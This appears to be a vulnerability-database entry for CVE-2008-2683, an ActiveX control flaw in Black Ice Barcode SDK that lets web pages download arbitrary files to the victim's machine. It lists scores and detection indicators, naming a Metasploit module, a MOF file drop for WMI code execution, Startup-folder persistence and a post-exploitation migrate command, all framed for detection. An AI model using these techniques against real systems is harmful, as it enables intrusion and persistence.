cbcvebase.
CVE-2008-2683
published 2008-06-12

CVE-2008-2683: The BIDIB.BIDIBCtrl.1 ActiveX control in BIDIB.ocx 10.9.3.0 in Black Ice Barcode SDK 5.01 allows remote attackers to force the download and storage of…

PriorityP351critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
34.76%
98.2th percentile
The BIDIB.BIDIBCtrl.1 ActiveX control in BIDIB.ocx 10.9.3.0 in Black Ice Barcode SDK 5.01 allows remote attackers to force the download and storage of arbitrary files by specifying the origin URL in the first argument to the DownloadImageFileURL method, and the local filename in the second argument. NOTE: some of these details are obtained from third party information.

Affected

1 ranges
VendorProductVersion rangeFixed in
black_icebarcode_sdk

Detection & IOCsextracted from sources · hover to see the quote

otherBIDIB.BIDIBCtrl.1
filenameBIDIB.ocx
other{D2797899-BE27-4CDB-892F-4FDC26EA9BA9}
other{79956462-F148-497F-B247-DF35A095F80B}
commandDownloadImageFileURL
  • Detect ActiveX instantiation of BIDIB.BIDIBCtrl.1 (CLSID {D2797899-BE27-4CDB-892F-4FDC26EA9BA9}) or BIImgFrm.ocx (CLSID {79956462-F148-497F-B247-DF35A095F80B}) in browser script, particularly calls to the DownloadImageFileURL method with two arguments (remote URL + local file path).
  • Alert on files written to C:\WINDOWS\system32\wbem\mof\ by a browser process, as the Metasploit module drops a MOF file there to achieve code execution via WMI.
  • Alert on executable files written to the Startup folder (C:\Documents and Settings\All Users\Start Menu\Programs\Startup\) by a browser or ActiveX process, a persistence technique used in the Cover Page SDK exploit variant.
  • Monitor for the 'migrate -f' post-exploitation command triggered via InitialAutoRunScript in Metasploit sessions originating from browser exploitation of this ActiveX control.
  • The BIDIB.ocx control is marked 'Safe for Script' and 'Safe for Init' in the registry, meaning it can be instantiated from any web page without a kill-bit prompt. Audit registry keys for these safe-for-scripting flags on the vulnerable CLSIDs.
  • ·The Metasploit Cover Page SDK module (exploit/windows/browser/blackice_downloadimagefileurl) targets BIImgFrm.ocx 12.0.0.0 (CLSID 79956462-F148-497F-B247-DF35A095F80B) as its primary target, while the original CVE references BIDIB.ocx 10.9.3.0 (CLSID D2797899-BE27-4CDB-892F-4FDC26EA9BA9); both share the same vulnerable method.
  • ·The WMI MOF-based code execution technique used by the Metasploit module only works on Windows versions before Vista.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.